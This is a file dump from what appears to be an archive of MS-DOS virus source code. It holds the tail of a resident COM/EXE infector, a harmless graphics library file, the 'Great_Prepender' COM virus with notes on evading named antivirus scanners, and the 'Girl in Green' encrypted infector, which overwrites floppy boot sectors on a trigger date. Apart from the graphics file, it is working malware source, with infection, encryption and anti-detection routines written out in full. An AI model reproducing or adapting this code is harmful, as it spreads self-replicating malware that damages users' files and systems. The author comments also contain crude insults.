pop es
mov di,offset buffer
mov si,offset signature
mov cx,SIGNLEN
rep cmpsb
jz return2_v
call beginptr ;read begin of file
mov cx,BUFLEN
mov dx,offset buffer
call flread
cmp byte ptr [comexe],EXESIGN
jz do_exe
do_com: cmp word ptr [oldlen],MAXTARGET ;check length of file
jnb return2
cmp word ptr [oldlen],MINTARGET
jbe return2
call writeprog ;write program to end of file
jc return2
mov ax,[oldlen] ;calculate new start-adres
add ax,(offset entry - 0103h)
mov byte ptr [buffer],0E9h ;'JMP'
mov word ptr [buffer+1],ax
jmp short verder1
return2_v: jmp short return2
do_exe: call writeprog ;write program to end of file
jc return2
mov ax,[oldlen] ;calculate new length
mov dx,[oldlen+2]
add ax,FILELEN
adc dx,0
mov cl,9 ;put new length in header
shr ax,cl
mov cl,7
shl dx,cl
or ax,dx
inc ax
mov word ptr [buffer+4],ax
mov ax,[oldlen]
add ax,FILELEN
and ax,01FFh
mov word ptr [buffer+2],ax
mov ax,[oldlen] ;calculate new CS & IP
mov dx,[oldlen+2]
mov bx,word ptr [buffer+8]
push ax
mov cl,4
shr ax,cl
mov cl,0Ch
shl dx,cl
add ax,dx
sub ax,bx
mov word ptr [buffer+16h],ax ;put CS in header
pop ax
and ax,000Fh
add ax,(offset entry - 0100h)
mov word ptr [buffer+14h],ax ;put IP in header
verder1: call beginptr ;write new begin of file
mov cx,BUFLEN
mov dx,offset buffer
call flwrite
return2: mov bx,[handle] ;restore file date & time
pop dx
pop cx
mov ax,5701h
int 21
mov bx,[handle] ;close the file
mov ah,3Eh
int 21
return1: pop cx ;restore file-attribute
call setattr
pop ds ;restore int24 vector
pop dx
mov ax,2524h
int 21
pop dx ;restore ctrl-break flag
mov ax,3301h
int 21
ret
;****************************************************************************
;* Gets ASCIIZ-filename from FCB
;****************************************************************************
FCBtoASC: mov si,dx
lodsb
inc al ;extended FCB?
jne normal_FCB
add si,7
normal_FCB: push cs
pop es
xor di,di ;adres for ASCIIZ-name
mov dx,di
mov cx,8
FCB_loop: lodsb ;copy all except spaces
cmp al,' '
je FCB_verder
stosb
FCB_verder: loop FCB_loop
mov al,'.' ;append a '.'
stosb
mov cl,3 ;and the extension
rep movsb
xchg ax,cx ;and a final zero.
stosb
push es
pop ds
ret
;****************************************************************************
;* Changes file-attributes
;****************************************************************************
setattr: lds dx,dword ptr cs:[nameptr]
mov ax,4301h
call org21
ret
;****************************************************************************
;* Writes program to end of file
;****************************************************************************
writeprog: call endptr
mov cx,FILELEN
mov dx,offset begin
; call flwrite ;Hmm, save a few bytes!
; ret
;****************************************************************************
;* Subroutines for reading/writing
;****************************************************************************
flwrite: mov ah,40h
jmp short flvrdr
flread: mov ah,3Fh
flvrdr: push cs
pop ds
mov bx,cs:[handle]
int 21
ret
;****************************************************************************
;* Subroutines for file-pointer
;****************************************************************************
beginptr: mov al,00h ;go to begin of file
jmp short ptrvrdr
endptr: mov al,02h ;go to end of file
ptrvrdr: xor cx,cx
xor dx,dx
ptrmov: mov bx,cs:[handle] ;go somewhere
mov ah,42h
int 21
ret
;****************************************************************************
;* This is where infected files start
;****************************************************************************
entry: call entry2
entry2: pop bx
sub bx,offset entry2 ;CS:BX is begin program - 100h
pushf
cld
cmp byte ptr cs:[bx+offset comexe],COMSIGN
jz entryC
entryE: mov ax,ds ;put old start-adres on stack
add ax,10
add ax,cs:[bx+offset buffer+016h]
push ax
push cs:[bx+offset buffer+014h]
jmp short entcheck
entryC: mov ax,bx ;restore old file-begin
add ax,offset buffer
mov si,ax
mov di,0100
mov cx,BUFLEN
rep movsb
push cs ;put old start-adres on stack
mov ax,0100h
push ax
entcheck: mov ax,0DADAh ;already installed?
int 21h
cmp ah,0A5h
je entstop
call install ;install the program
entstop: iret
;****************************************************************************
;* Install the program at top of memory
;****************************************************************************
install: push ds
push es
xor ax,ax ;get original int21 vector
mov es,ax
mov cx,word ptr es:0084h
mov dx,word ptr es:0086h
mov cs:[bx+offset oi21],cx
mov cs:[bx+offset oi21+2],dx
mov ax,ds ;adjust memory-size
dec ax
mov es,ax
cmp byte ptr es:[0000h],5Ah
jnz cancel
mov ax,es:[0003h]
sub ax,RESPAR
jb cancel
mov es:[0003h],ax
sub es:[0012h], word ptr RESPAR
push cs ;copy program to top
pop ds
mov es,es:[0012h]
mov ax,bx
add ax,0100
mov si,ax
mov di,0100h
mov cx,FILELEN
rep movsb
mov dx,offset ni21 ;set vector to new handler
push es
pop ds
mov ax,2521h
int 21h
cancel: pop es
pop ds
ret
;****************************************************************************
;* Text and Signature
;****************************************************************************
envstring: db 'E=mcý',0 ;put this in your environment!
signature: db 'GOTCHA!',0 ;I have got you! :-)
signend:
end:
cseg ends
end begin

MSDOS/G-Index/Virus.MSDOS.Unknown.graflib.asm
+93
View File
@@ -0,0 +1,93 @@
;
; grafix --- graflib.asm
;
; miscellaneous assembly routines
;
; Written 4/87 by Scott Snyder (ssnyder@romeo.caltech.edu or @citromeo.bitnet)
;
; Modified 5/29/87 by sss to allow for different memory models
;
title graflib
include macros.ah
buflen equ 32768
sseg
endss
dseg
endds
buf segment public 'BUF'
db buflen dup(?)
buf ends
cseg _graflib
pBegin g_bufseg
mov ax, buf
ret
pEnd g_bufseg
pBegin g_fmemcpy
push bp
mov bp,sp
push di
push si
push ds
cld
les di,[bp+argbase]
lds si,[bp+argbase+4]
mov cx,[bp+argbase+8]
shr cx, 1
jnc c1
movsb
c1: rep movsw
pop ds
pop si
pop di
mov sp,bp
pop bp
ret
pEnd g_fmemcpy
pBegin g_fmemset
push bp
mov bp,sp
push di
push si
cld
les di,[bp+argbase]
mov al,[bp+argbase+4]
mov ah,al
mov cx,[bp+argbase+6]
shr cx,1
jnc s1
stosb
s1: rep stosw
pop si
pop di
mov sp,bp
pop bp
ret
pEnd g_fmemset
df_ g_fmemcpy
df_ g_fmemset
df_ g_bufseg
endcs _graflib
end
MSDOS/G-Index/Virus.MSDOS.Unknown.greatpre.asm
+183
View File
@@ -0,0 +1,183 @@
;******************************************************************************
;
; "I'm the great prepender!" - Jest on Queen by Rajaat / Genesis
;
;******************************************************************************
;
; Virus name : Great_Prepender
; Author : Rajaat
; Origin : United Kingdom, December 1995
; Compiling : Using TASM | Using A86
; |
; TASM /M PREPEND | A86 PREPEND.ASM
; TLINK /T PREPEND |
; Targets : COM files
; Size : 144 bytes
; Resident : No
; Polymorphic : No
; Encrypted : No
; Stealth : No
; Tunneling : No - is not needed for some programs
; Retrovirus : Yes - TBAV, SUSPICIOUS, F-PROT & VSAFE
; Antiheuristics: Yes - TBAV, SUSPICIOUS & F-PROT
; Peculiarities : Shifts the whole file after the virus code
; Rewrites the whole file for infection
; Avoids TBAV & SUSPICIOUS using a 2 byte signature
; Drawbacks : Hangs if host is TSR program
; Hangs if host jumps to PSP:0
; Needs at least 64k free space after host
; Behaviour : When a COM file infected with Great_Prepender virus is
; executed, the virus will search for a COM file in the
; current directory that doesn't have a 0 in the seconds
; field of the file date/time. The virus will read the entire
; file in a block after the current host. Great_Prepender now
; creates a new file with the same name and writes itself at
; the start of the file, and appends the rest of the host
; behind it's own code, thus effectively shifting the whole
; host with 144 bytes. The virus will restore the host in a
; very peculiar way. It modifies the segment registers in a
; way that the host looks if it's aligned at 100h, the normal
; address for COM files to start. It then copies most of the
; DTA over it's own code and executes the host. The stack
; segment is not modified. Because the virus shifts only the
; DTA and doesn't change the memory allocation, resident
; programs have a chance of crashing, because they don't
; allocate 144 bytes of their own code (if function 31h is
; used for the allocation). Great_Prepender is targetted at
; a few resident behaviour blockers, effectively avoiding them.
; The virus also has some tricks to avoid being scanned by a
; few antivirus programs that can perform heuristic scanning.
; It's unknown what this virus might do besides replicate :)
;******************************************************************************
;
; Results with antivirus software
;
; TBFILE - doesn't trigger
; TBSCAN - flags 'p' (packed file)
; TBCLEAN - can't reconstruct without ANTIVIR.DAT
; SVS - doesn't trigger
; SSC - no flags
; F-PROT - no virus found
; F-PROT /ANALYSE - no virus found
; F-PROT /ANALYSE /PARANOID - unusual code
; AVP - virus type Com suspicion (0 bytes)
; VSAFE - doesn't trigger
; NEMESIS - triggers :(
;
;******************************************************************************
;
; Big hello to : Immortal Riot, VLAD, Phalcon/Skism and everyone on #virus who
; deserves it to be greeted by me.
;
;******************************************************************************
.model tiny
.code
org 100h
dta equ 0fd00h-1eh
;===( Main part of the virus )=================================================
im_the_great_prepender:
push ax ; fool TBSCAN and SSC
dec bx
xchg ax,cx
mov ah,1ah
mov dx,dta
int 21h ; move dta to end of segment
mov ah,4eh
find_next: lea dx,filemask
int 21h ; search COM file
jc restore_host ; go restore_host if seek fails
mov ah,4fh
test byte ptr ds:dta+16h,00011111b
jz find_next ; if seconds != 0 go find_next
;===( Infect file )============================================================
mov ah,3dh
mov dx,dta+1eh
int 21h ; open file with read access
xchg ax,bx
xchg ax,cx
push ds
pop ax
add ah,10h
push ax
push ax
pop ds
mov ah,3fh
cwd ; read whole file in next
int 21h ; 64k block
push ax ; store file size
push cs
pop ds
mov ah,3eh
int 21h ; close file
mov ah,3ch
mov dh,0fdh
inc cx
int 21h ; create new file (overwrite)
mov ah,40h
mov dh,01h
mov cl,virus_size
int 21h ; write virus
mov ah,40h
pop cx
pop ds
cwd
int 21h ; write host
push cs
pop ds
mov ax,5701h
mov cx,word ptr ds:dta+16h
mov dx,word ptr ds:dta+18h
and cl,11100000b ; set seconds to 0 and
int 21h ; restore date/time
mov ah,3eh
int 21h ; close file
;===( Return to host )=========================================================
restore_host: push cs ; shift the segment
pop si ; and prepare for dta
add si,09h ; transfer.
push si
push si
mov di,100h-(virus_end-reconstruct)
mov cx,di
push di
push si
pop es
xor si,si
mov di,si
mov dx,80h
retf ; jump to new cs:ip (shifted)
filemask db '*Rajaat.COM',0 ; file mask and author name
reconstruct: rep movsb ; copy dta to new location
pop ds ; (over virus code)
mov ah,1ah
int 21h ; set new dta
pop ax ; clear ax
virus_end equ $
virus_size equ $-im_the_great_prepender
;===( Original shifted host )==================================================
mov ax,4c00h
int 21h
end im_the_great_prepender
MSDOS/G-Index/Virus.MSDOS.Unknown.green.asm
+673
View File
@@ -0,0 +1,673 @@
GREEN_GIRL SEGMENT
;
; The "Girl in Green" Virus by The Methyl-Lated Spirit
;
; Alright, here is the low-down on this virus.
; - XOR and NOT encryption
; - Boot block message display <see below>
; - .EXE and .COM infection <in that order>
; - Direct Action <I SWEAR the next will be TSR>
; - INT 042H Handler
; - Teensy weensy little bit of anti-debugging shit
; - Neat activation <boot block, see below>
; - Directory Traversal
; - Restores original Date/Time/Attributes
; - Won't infect Windows .EXE's
; - Won't fuck up too often because of extensive testing of it
;
; A short note on the boot block:
;
; This virus has a boot block, yes, thats right, a boot block!
; On July the 3rd, MY birthday, it will capture a picture of the first
; sector of the disk in A: into a file on the A: called boot.sec, then
; it will overwrite the original bootblock with some code, and when you
; re-boot onto that disk... well, I'll let you see yourself <it aint
; destructive, and that boot.sec is there in case you wanna restore it,
; aren't I a nice guy? *G*>. It was made originally for EGA, but should
; work on other monitors too, although the colours may be weird.
;
; Basically, there is no easy way to go through this virus. It is
; a great desendant from Spaghetti <yes, the food>. It jumps here, there
; everywhere, and, well, I don't believe I've created such a monster.
; Here is a little look see at it. It goes through 2 phases determined
; by the run_count counter. A setting of 1 means it is the first time through
; and that it should look for .EXE files to infect. After that, it is set to
; 2 and it searches for .COM files to infect. It will only infect 1 file on
; each run. After that, when it goes to restart the host, it looks at the
; com_or_exe variable. A setting of 1 means the current file is a .EXE and
; should be restored in that way, and a setting of 2 means the current file
; is a .COM file and should be restored as such. These variables are
; temporarily changed while writing the virus to a new file to reflect
; the hosts new attributes.
;
; Dedications:
; - The knock-out babe on the 424 bus home from school every day
;
; Big time fuck you's to:
; - Peter Doyle. FACE IT! COMPUSERVE SUX!
; - Dick Smith's Shops. HAHAHAHA, THE TOILET BOWL VIRUS STRIKES AGAIN!
; - MYER stores in Perth
; "If you do not remove yourself from that computer, I
; shall have to call security". HAHAHAHAHAHAHAHAHAHA
; - Deth : MYER was fun, but you are a liar and a theif, FUCK YOU
; : You don't NARK on people you did a B&E with just because
; : you're having PMS, get a life arsehole. Liquid Plastic SUX.
;
; Greets to:
; - Ral : Techno roqs just about as much as Jim Morrison
; - Grey : Thanx for the chats dude
; - Rainbow Bright/Telco Ray : Haven't seen u on the net laterly!
; - Shalazar : What is there to say? You're a dude.
; - Titanium Warrior : I'm gunna get you!
; - And all those wonderfull people in GrayLands that gave me this nice
; padded cell so I wouldn't bang my head to hard on the walls
; when I got frustrated debugging this thing :)
;
; Sources:
; - Much code from my first virus, The Toilet Bowl
; - VLAD, the info on how to check for WinEXE files
; - 40-hex article by Dark Avenger on .EXE infections
; - 40-hex article on how boot-sectors work <I just needed
; the offset in memory where they are loaded, 0:7C00>
;
; Reasons for writing it:
; If you're wondering why this is called the "Girl in Green" virus, well, here
; is the answer. I am Methyl, hanging on #AUSSIES alot, and I met a
; BEAUTIFUL girl on da bus, and she was dressed in her green school uniform.
; Well, I'm, of course, gunna ask her out when I get sum guts, but first
; I thought I'd be really kind and create a virus to show my love for her! :>
;
; So if you <you know who you are> were wearing a slazenger suit into
; Karrinyup on Mothers Day, and a phreak in white with the wierdest
; pair of jeans in the world on came up to you and said "Hello", then,
; I LOVE YOU! <evil grin>
;
ORG 0H ;
;
START: ; Host file
MOV AH,4CH ;
INT 21H ;
;
BEGIN: ;
MOV AH,1 ; TbAV will go no further :)
INT 016H ;
;
JMP $+3 ; Stop F-PROT flagging this as a virus
DB 081H, 0E8H, 00H, 00H ;
;
GET_DELTA: ;
MOV BP,SP ;
SUB WORD PTR [SS:BP], OFFSET GET_DELTA
MOV AX,[SS:BP] ;
ADD SP,2 ;
MOV BP,AX ;
;
PUSH DS ; Save PSP segment
PUSH ES ;
MOV DS,CS ; Make ES=DS=CS
MOV ES,DS ;
;
; I've done a little thing here that makes this baby easier to compile.
; When first compiled, the variable enc_or_not will equal 0, and so the
; encrypting routines shan't be run, because the virus has not yet encrypted
; itself. After the first run, this value is changed forever to be 1, so that
; encryption is always carried out on the new infected files. It takes up a
; bit of space, but, like I said, easier to compile.
;
;
CMP BYTE PTR [OFFSET ENC_OR_NOT+BP], 0
JE START_XOR ;
; Call encryption routines
CALL NOTTER ;
CALL XORER ;
;
START_XOR: ; Begin XOR'ing here
MOV BYTE PTR [OFFSET ENC_OR_NOT+BP], 1
; Determine which method will be used later
; to jump back to host, and restores the
; appropriate host bytes.
CMP BYTE PTR [OFFSET COM_OR_EXE+BP], 1
JE EXE_BYTES ;
; This will restore .COM files
LEA SI,[OFFSET ORIG_3+BP]
MOV DI,0100H ;
MOVSB ;
MOVSB ;
MOVSB ;
JMP RESET ;
;
EXE_BYTES: ; This is for .EXE's
MOV WORD PTR [ORIG_CSIP+BP], WORD PTR [TEMP_CSIP+BP]
MOV WORD PTR [ORIG_SSSP+BP], WORD PTR [TEMP_SSSP+BP]
MOV WORD PTR [ORIG_CSIP+BP+02H], WORD PTR [TEMP_CSIP+BP+02H]
MOV WORD PTR [ORIG_SSSP+BP+02H], WORD PTR [TEMP_SSSP+BP+02H]
;
RESET: ; Reset run counter
MOV BYTE PTR [OFFSET RUN_COUNT+BP],1
;
SET_NEW_DTA: ; Make a new DTA
MOV AH, 01AH ;
LEA DX, OFFSET NEW_DTA_AREA+BP
INT 021H ;
;
SAVE_CURRENT_DIR: ; Save current directory for traversal functions
MOV AH, 047H ;
XOR DL, DL ;
LEA SI, OFFSET DIR_BUFFER+BP
INT 021H ;
;
SET_ERRORS: ; Make a new error handler to stop
; write protect errors propping up.
MOV AX, 03524H ;
INT 21H ;
;
LEA DI, OFFSET OLD_ERROR+BP
MOV [DI],ES ;
ADD DI,2 ;
MOV [DI],BX ;
;
MOV AX,02524H ;
LEA DX, OFFSET NEW_ERROR_HANDLER+BP
INT 21H ;
;
MOV ES, DS ; Restore modified ES register
; *********************************************************************
; Activation routine for July 3rd.
;
;
MOV AH, 02AH ; Get date
INT 21H ;
;
MONTH: ;
CMP DH, 07H ; Check if it is July
JE DAY ;
JMP DATE_TEST_PASSED ;
;
DAY: ;
CMP DL, 03H ; Check if it is the 3rd
JE BOOTER ;
JMP DATE_TEST_PASSED ;
; If it got to this point, ITS MY BIRTHDAY!
BOOTER: ;
MOV AX,0201H ; Read old boot block data
MOV CX,1 ;
XOR DX,DX ;
LEA BX,OFFSET OLD_DATA+BP;
INT 013H ;
;
MOV AH,03CH ; Create A:\BOOT.SEC
XOR CX,CX ;
LEA DX,OFFSET BOOT_NAME+BP
INT 21H ;
;
JC QUIT ; Disk not there maybe?
;
XCHG BX,AX ; Write A:\BOOT.SEC
MOV AH,040H ;
MOV CX,512 ;
LEA DX,OFFSET OLD_DATA+BP
INT 021H ;
;
MOV AH,03EH ;
INT 021H ; Close file with boot sector inside
;
MOV AX,0301H ; Write new boot sector to floppy
MOV CX,1 ;
XOR DX,DX ;
LEA BX, OFFSET START_WRITE+BP
INT 13H ;
;
QUIT: ; Reboot computer to load up new boot segment
MOV AX,040H ; Set up for a warm reboot <quicker>
MOV DS,AX ;
MOV AX, 012H ;
MOV [072H], AX ;
;
DB 0EAH ; Do a jump to Offset:Segment following
DB 00,00,0FFH,0FFH ; which is FFFF:0000 as segment:offset
;
;***********************************************************************
; This is the boot_block start
START_WRITE: ;
CLD ;
;
NO_CURSOR: ;
MOV AH,1 ;
MOV CX,02000H ;
INT 010H ;
;
MOV AX,0B800H ; Colour video segment
MOV ES,AX ;
XOR DI,DI ;
LEA SI, 07C00H+(OFFSET MESSAGE-OFFSET START_WRITE)
;
LOOPY_GREEN: ;
MOV CX, 23 ;
REP MOVSW ;
SUB SI, 46 ;
LEA AX, 07C00H+(OFFSET LOOPY_GREEN-OFFSET START_WRITE)
JMP AX ;
;
MESSAGE DB 'I',02,32 ,02,03 ,02,32 ,02,'Y',02,'O',02,'U',02,32,02
DB 'G',02,'I',02,'R',02,'L',02,32 ,02,'I',02,'N',02
DB 32 ,02,'G',02,'R',02,'E',02,'E',02,'N',02,'!',02,32,02
;
; This is the boot_block end
;***********************************************************************
;
DATE_TEST_PASSED: ; Find first file
MOV AH,04EH ;
JMP FINDER ;
;
CHANGE_DIR: ; Go down in directory structure
MOV AH,03BH ;
LEA DX,OFFSET CHANGE_TO+BP
INT 021H ;
JC END_ALL ; In root, no more files
;
MOV AH,04EH ; Since it is is a new dir, find first file
JMP FINDER ;
;
RESET_ATTRIBS: ; Reset file time/date
MOV AX,05701H ;
MOV CX,[OFFSET TIME+BP] ;
MOV DX,[OFFSET DATE+BP] ;
INT 021H ;
RET ;
;
CLOSE_FILE: ; Close file and reset attributes
MOV AH,03EH ;
INT 021H ;
;
MOV AX,04301H ;
MOV CX,[OFFSET ATTRIBS+BP]
LEA DX,OFFSET NEW_DTA_AREA+1EH+BP
INT 021H ;
RET ;
;
FINDER: ; Find first/next routine
LEA DX,[OFFSET FILE_MASK+BP]
MOV CX,0007H ;
INT 021H ;
;
JC CHANGE_DIR ; Change dir if no more files
JMP FILE_FOUND ;
;
DO_OTHER: ; Change file mask. This is the 2nd
; pass, so look for .COM's instead of .EXE's
MOV BYTE PTR [OFFSET RUN_COUNT+BP],2
MOV WORD PTR [OFFSET FILE_MASK+BP+2],'OC'
MOV BYTE PTR [OFFSET FILE_MASK+BP+4],'M'
MOV AH,04EH ;
JMP FINDER ;
;
END_ALL: ;
MOV AH,03BH ; Change to original dir
LEA DX,OFFSET SLASH+BP ;
INT 021H ;
; Do second pass if not done already
CMP BYTE PTR [OFFSET RUN_COUNT+BP], 1
JE DO_OTHER ;
;
; Reload original error handler
MOV DX,[OFFSET OLD_ERROR+BP+02H]
MOV DS,[OFFSET OLD_ERROR+BP]
MOV AX,02524H ;
INT 021H ;
;
POP ES ; Reload original DS, ES
POP DS ;
; Determine host file type
CMP BYTE PTR [OFFSET COM_OR_EXE+BP],1
JE EXE_RESTORE ;
;
MOV AH,01AH ; This will restore a .COM file
MOV DX,080H ;
INT 021H ;
;
MOV DX,0100H ;
JMP DX ;
;
EXE_RESTORE: ; This will restore a .EXE file
;
MOV AH,1AH ; Reset original PSP
MOV DX,080H ;
INT 021H ;
;
MOV AX,ES ; Get CS:IP ready to jump to
ADD AX,010H ;
ADD WORD PTR CS:[BP+ORIG_CSIP+02H],AX
ADD AX, WORD PTR CS:[BP+ORIG_SSSP+02H]
;
CLI ; Restore stack segment and stack pointer
MOV SP, WORD PTR CS:[BP+ORIG_SSSP]
MOV SS,AX ;
STI ;
;
DB 0EAH ; Far Jump Offset:Segment following
;
;***************************************************************************
; Data area
;
ORIG_CSIP DW 0,0 ; Original CS:IP value
ORIG_SSSP DW 0,0 ; Original SS:SP value
;
TEMP_CSIP DW 0,0 ; Temporary CS:IP value
TEMP_SSSP DW 0,0 ; Temporary SS:SP value
;
CHANGE_TO DB '..',0 ; For directory traversal functions
FILE_MASK DB '*.EXE',0 ; File mask <DUH!>
;
BOOT_NAME DB 'A:\BOOT.SEC',00 ; Holds original boot sector of a diskette
;
COM_OR_EXE DB 1 ; 1=exe, 2=com
RUN_COUNT DB 1 ; 1=first, 2=second
;
JUMPING DB 0E9H,00,00 ; Jump construct for a .COM file
ORIG_3 DB 3 DUP(?) ; Original .COM file bytes
;
; End Data area
;***************************************************************************
;
POINTER_MOVER: ;
XOR CX,CX ;
XOR DX,DX ;
MOV AH, 042H ;
INT 021H ;
RET ;
;
COM_TIME: ; Checks for ibmdos.com, ibmbio.com, command.com
; So it works on PC/DOS and MS/DOS
MOV AL, BYTE PTR [OFFSET NEW_DTA_AREA+BP+01EH+2]
CMP AL,'M' ;
JNE NOT_DOS_FILE ;
JMP NOPE ;
;
NOT_DOS_FILE: ;
MOV AL,02H ;
CALL POINTER_MOVER ;
;
SUB DX,1 ; Jump to end of file-1
SBB CX,0 ;
MOV AX,04202H ;
INT 021H ;
;
MOV AH,03FH ; Read last byte of file
MOV CX,1 ;
LEA DX,OFFSET ORIG_3+BP ;
INT 021H ;
;
MOV AL,[OFFSET ORIG_3+BP]
CMP AL,'\' ;
JNE CHECK_IT ; Infect file
;
NOPE: ; Can't infect for some reason or another
CALL RESET_ATTRIBS ;
CALL CLOSE_FILE ;
MOV AH,04FH ;
JMP FINDER ; Already infected (It's my BAAAABBYYYY)
;
CHECK_IT: ;
XOR AL,AL ; Beginning of file
CALL POINTER_MOVER ;
;
MOV AH,03FH ; Read files first 3 bytes
MOV CX,3 ;
LEA DX,[OFFSET ORIG_3+BP]
INT 021H ;
;
MOV AL,[OFFSET ORIG_3+BP]
ADD AL,[OFFSET ORIG_3+BP+1]
CMP AX,'M'+'Z' ;
JE NOPE ;
;
INFECT_COM: ;
MOV AL,02H ;
CALL POINTER_MOVER ;
;
SUB AX,3 ; Calculate jump offset
MOV [OFFSET JUMPING+BP+1],AX
;
XOR AL,AL ; Beginning of file
CALL POINTER_MOVER ;
;
MOV CX,3 ; Write jump bytes
MOV AH,040H ;
LEA DX,OFFSET JUMPING+BP;
INT 021H ;
;
; So that the infected file will look for
; .EXE's on the first run and not .COM's,
; this code here must be added
MOV WORD PTR [OFFSET FILE_MASK+BP+2],'XE'
MOV BYTE PTR [OFFSET FILE_MASK+BP+4],'E'
; Make sure that when the virus runs of it's new
; .COM host, it knows it and isn't running as if
; it was on the old host <i.e. restore host
; as a .COM and not a .EXE>
MOV AL,[OFFSET COM_OR_EXE+BP]
PUSH AX ;
MOV BYTE PTR [OFFSET COM_OR_EXE+BP],2
JMP END_WRITER ;
;
FILE_FOUND: ;
MOV AX, 04300H ; Get and save attribs
LEA DX,[OFFSET NEW_DTA_AREA+BP+01EH]
INT 21H ;
;
MOV [OFFSET ATTRIBS+BP],CX
MOV WORD PTR [OFFSET TIME+BP],[OFFSET NEW_DTA_AREA+BP+016H]
MOV WORD PTR [OFFSET DATE+BP],[OFFSET NEW_DTA_AREA+BP+018H]
;
CHANGE_ATTRIBS_NORMAL: ; Change attributes to NULL
MOV AX,04301H ;
XOR CX,CX ;
LEA DX,[OFFSET NEW_DTA_AREA+BP+01EH]
INT 021H ;
JNC OPEN_FILE ;
MOV AH,04FH ;
JMP FINDER ; Somefink went wrong!
;
OPEN_FILE: ; Open da file
MOV AX,03D02H ;
LEA DX,OFFSET NEW_DTA_AREA+BP+01EH
INT 021H ;
JNC WHAT_WRITE_ROUTINE ;
MOV AH,04FH ;
JMP FINDER ; Somefink else went wrong!
;
WHAT_WRITE_ROUTINE: ; Write to a .COM or .EXE
XCHG BX,AX ; Put file handle in BX
CMP BYTE PTR [OFFSET FILE_MASK+BP+2],'E'
JE CHECK_INFECTED ;
JMP COM_TIME ;
;
CHECK_INFECTED: ; Read in file header
MOV CX,01AH ; .EXE header is (01Ah bytes)
MOV AH,3FH ;
LEA DX,OFFSET FILE_HEADER+BP
INT 021H ;
; Check if it is already infected
CMP WORD PTR [OFFSET FILE_HEADER+BP+012H],'GG'
JNE TEST_WIN ;
JMP NOPE ;
;
NEW_ERROR_HANDLER: ; New INT 024H handler
MOV AL,3 ; Fail system call <VLAD said to do this>
IRET ;
;
TEST_WIN: ;
MOV AX,[OFFSET FILE_HEADER+BP+018H]
CMP AX,040H ;
JB MODIFY_HEADER ; Not windows file
JMP NOPE ; Is windows file
;
MODIFY_HEADER: ; Begin transmorgification of the header
MOV AL,02H ; Get file size for later on
CALL POINTER_MOVER ;
;
PUSH BX ; Save handle
PUSH DX ; Save file size
PUSH AX ;
; TEMP_CSIP = Offset : Segment
LES AX, DWORD PTR [OFFSET FILE_HEADER+BP+014H]
MOV WORD PTR [BP+OFFSET TEMP_CSIP], AX
MOV WORD PTR [BP+OFFSET TEMP_CSIP+02H], ES
; Save stack pointer
; TEMP_SSSP = Offset : Segment
LES AX, DWORD PTR [OFFSET FILE_HEADER+BP+0EH]
MOV WORD PTR [BP+OFFSET TEMP_SSSP],ES
MOV WORD PTR [BP+OFFSET TEMP_SSSP+02H],AX
; Convert header size to bytes
; <originally in paragraphs>
MOV AX, WORD PTR [BP+FILE_HEADER+08H]
MOV CL,04H ;
SHL AX,CL ;
;
XCHG BX,AX ; BX now holds the header size in bytes
;
POP AX ; Get file size into DX:AX
POP DX ;
;
PUSH AX ; Save file size for later AGAIN
PUSH DX ;
;
SUB AX,BX ; Take header size from file size
SBB DX,0 ;
;
MOV CX,010H ; Make it segment:offset form
DIV CX ;
; Write new entry point
MOV WORD PTR [OFFSET FILE_HEADER+BP+014H],DX
MOV WORD PTR [OFFSET FILE_HEADER+BP+016H],AX
; Write new Stack
; Pointer and....
MOV WORD PTR [OFFSET FILE_HEADER+BP+010H],0
; Segment!
MOV WORD PTR [OFFSET FILE_HEADER+BP+0EH],AX
; Write ID bytes
MOV WORD PTR [OFFSET FILE_HEADER+BP+012H],'GG'
;
POP DX ; Get file length
POP AX ;
; Add virus size
ADD AX,OFFSET END_VIRUS-OFFSET BEGIN
ADC DX,0 ;
;
MOV CL,9 ;
PUSH AX ; Save file size+virus size
;
SHR AX,CL ;
ROR DX,CL ;
STC ;
ADC DX,AX ; File size in pages
POP AX ;
AND AH,1 ; MOD 512
; Write new file size
MOV WORD PTR [BP+OFFSET FILE_HEADER+04H],DX
MOV WORD PTR [BP+OFFSET FILE_HEADER+02H],AX
; Increase minimum memory requirements to
; ORIG_MEM + VIRUS_MEM = TOTAL_MEM 8)
MOV AX,OFFSET END_FILE-OFFSET BEGIN
MOV CL,4 ;
SHR AX,CL ;
;
ADD AX,WORD PTR [BP+OFFSET FILE_HEADER+0AH]
MOV WORD PTR [BP+OFFSET FILE_HEADER+0AH],AX
;
POP BX ; Get handle again
;
MOOWAAHAAHAAHAA: ; Infect the wanker!
XOR AL,AL ; Move to da start of da file
CALL POINTER_MOVER ;
;
MOV CX,01AH ; Write header
MOV AH,040H ;
LEA DX,OFFSET FILE_HEADER+BP
INT 021H ;
; So that the virus, when executing of its
; new host knows that it will restore the bytes
; as if attatched to a .EXE file
MOV AL, BYTE PTR [OFFSET COM_OR_EXE+BP]
PUSH AX ;
MOV BYTE PTR [OFFSET COM_OR_EXE+BP],1
;
END_WRITER: ;
MOV AL,02H ; Move to da end of da file
CALL POINTER_MOVER ;
;
MAKE_NEW_ENC_VALUE: ; Get a new random encryption value
MOV AH,2CH ;
INT 21H ;
MOV BYTE PTR [OFFSET ENCRYPTION_VALUE+BP],DL
;
END_XOR: ; End XOR here
; Make it my BAAAABBYYYY
CALL XORER ;
CALL NOTTER ;
;
MOV CX,OFFSET END_VIRUS-OFFSET BEGIN
MOV AH,40H ;
LEA DX,OFFSET BEGIN+BP ;
INT 021H ;
;
CALL NOTTER ; Decrypt virus
CALL XORER ;
; Restore original com_or_exe value
POP AX ;
MOV BYTE PTR [OFFSET COM_OR_EXE+BP],AL
;
CALL RESET_ATTRIBS ;
CALL CLOSE_FILE ;
JMP END_ALL ;
;
;
XORER: ;
CLD ; String instruction increment
MOV ES,CS ;
MOV AH, [OFFSET ENCRYPTION_VALUE+BP]
MOV CX, OFFSET END_XOR-OFFSET START_XOR
LEA SI, [OFFSET START_XOR+BP]
MOV DI, SI ;
;
XOR_LOOPER: ;
LODSB ;
XOR AL,AH ;
STOSB ;
LOOP XOR_LOOPER ;
RET ;
;
NOTTER: ;
CLD ; Make sure string instructions increment
MOV ES,CS ;
MOV CX,OFFSET NOTTER-OFFSET XORER
LEA SI,[OFFSET XORER+BP]
MOV DI,SI ;
;
NOT_LOOPER: ;
LODSB ;
NOT AL ;
STOSB ;
LOOP NOT_LOOPER ;
RET ;
;
ENCRYPTION_VALUE DB 0 ;
ENC_OR_NOT DB 0 ; To encrypt or not to encrypt
SLASH DB '\' ; For directory traversal functions
;
END_VIRUS: ; Everything from here on is not written
; to infected files
;
DIR_BUFFER DB 64 DUP (?) ; For directory traversal functions
